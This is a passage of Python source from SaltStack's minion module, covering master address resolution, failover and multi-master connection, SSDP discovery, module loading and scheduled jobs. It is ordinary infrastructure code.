log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: anything os.makedirs would accept as a mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
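# The discovery options consumed below live under the 'discovery' key of
# the minion config. A hedged, illustrative example (keys match what this
# method reads; the values and the mapping entry are made up):
#
#   discovery:
#     attempts: 3      # how many SSDP query rounds to try
#     pause: 5         # seconds to sleep between rounds
#     match: any       # 'any' or 'all' mapping keys must match
#     mapping:
#       role: web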
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if (policy == 'any' and bool(cnt)) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
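# Illustrative config (example values, not defaults): when both options are
# set, the method picks a random delay in the inclusive range, which spreads
# return traffic from many minions over time.
#
#   return_retry_timer: 5
#   return_retry_timer_max: 10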
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
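# A minimal usage sketch (paths and the called function are illustrative;
# opts must point at a reachable master, or use file_client: local):
#
#   import salt.config
#   import salt.minion
#
#   opts = salt.config.minion_config('/etc/salt/minion')
#   sminion = salt.minion.SMinion(opts)
#   sminion.functions['test.ping']()   # call any loaded execution module
#   sminion.states                     # loaded state modules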
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted; otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
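# In multi-master mode the manager spawns one Minion per entry in the
# 'master' list. An illustrative (not authoritative) config:
#
#   master:
#     - master1.example.com
#     - master2.example.com
#   master_type: str    # plain multi-master; 'failover' keeps a single Minion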
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0  # we have never signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
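# Sketch of the memory-cap math used below (only on *nix, and only when both
# psutil and resource are importable): the new RLIMIT_AS limit is roughly
#
#   mem_limit = current_rss + current_vms + opts['modules_max_memory']
#
# i.e. the configured value is head-room (in bytes) on top of current usage.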
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
